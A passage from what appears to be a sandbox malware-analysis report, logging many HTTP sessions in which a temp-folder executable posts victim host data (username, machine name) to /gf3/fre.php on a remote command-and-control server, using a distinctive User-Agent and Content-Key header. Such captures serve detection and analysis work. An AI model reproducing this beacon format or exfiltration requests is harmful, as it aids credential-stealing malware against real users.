                        May 4, 2022 17:06:27.365942955 CEST1396OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:27.621609926 CEST1396INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:06:04 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        18192.168.2.44978688.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:29.101313114 CEST1397OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:06:29.129045010 CEST1397OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:29.614717007 CEST1398INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:06:05 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        19192.168.2.44978788.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:31.292534113 CEST1398OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:06:31.319397926 CEST1399OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:31.742971897 CEST1399INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:06:07 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        2192.168.2.44976188.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:05:50.222184896 CEST1138OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:05:50.248879910 CEST1139OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:05:50.684990883 CEST1139INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:05:26 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        20192.168.2.44978888.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:33.132720947 CEST1400OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:06:33.160716057 CEST1400OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:33.611125946 CEST1400INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:06:09 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        21192.168.2.44978988.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:34.736742973 CEST1401OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:06:34.764890909 CEST1401OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:35.234499931 CEST1402INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:06:11 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        22192.168.2.44979088.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:36.270567894 CEST1403OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:06:36.297709942 CEST1403OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:36.675434113 CEST1403INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:06:12 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        23192.168.2.44979188.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:38.277874947 CEST1404OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:06:38.307068110 CEST1404OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:38.732588053 CEST1405INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:06:14 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        24192.168.2.44979288.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:40.198896885 CEST1405OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:06:40.226010084 CEST1406OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:40.593791962 CEST1406INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:06:16 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        25192.168.2.44979388.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:46.019048929 CEST1407OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:06:46.045844078 CEST1407OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:46.460576057 CEST1407INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:06:22 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        26192.168.2.44979488.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:47.499152899 CEST1408OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:06:47.526576042 CEST1408OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:47.985481024 CEST1409INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:06:24 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        27192.168.2.44979788.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:51.121382952 CEST1424OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:06:51.150501966 CEST1424OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:51.541780949 CEST1456INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:06:27 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        28192.168.2.44979888.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:54.199563980 CEST1457OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:06:54.231190920 CEST1457OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:54.742448092 CEST1457INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:06:30 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        29192.168.2.44979988.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:57.725161076 CEST1458OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:06:57.752672911 CEST1458OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:58.254968882 CEST1459INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:06:34 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        3192.168.2.44976288.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:05:51.935858011 CEST1140OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:05:51.963324070 CEST1140OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:05:52.472199917 CEST1232INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:05:28 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        30192.168.2.44980088.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:07:00.180937052 CEST1459OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:07:00.208014011 CEST1460OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:07:00.547756910 CEST1460INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:06:36 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        31192.168.2.44980188.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:07:04.571093082 CEST1461OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:07:04.602770090 CEST1461OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:07:05.007163048 CEST1461INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:06:41 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        32192.168.2.44980288.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:07:06.183458090 CEST1462OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:07:06.213478088 CEST1463OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:07:06.643095016 CEST1465INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:06:42 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        33192.168.2.44980888.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:07:08.526354074 CEST6566OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:07:08.553894043 CEST6566OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:07:09.009329081 CEST6567INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:06:45 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        34192.168.2.44980988.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:07:12.448956966 CEST6567OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:07:12.475779057 CEST6568OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:07:12.890173912 CEST6568INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:06:49 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        35192.168.2.44981088.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:07:15.237173080 CEST6569OUTPOST /gf3/fre.php HTTP/1.0
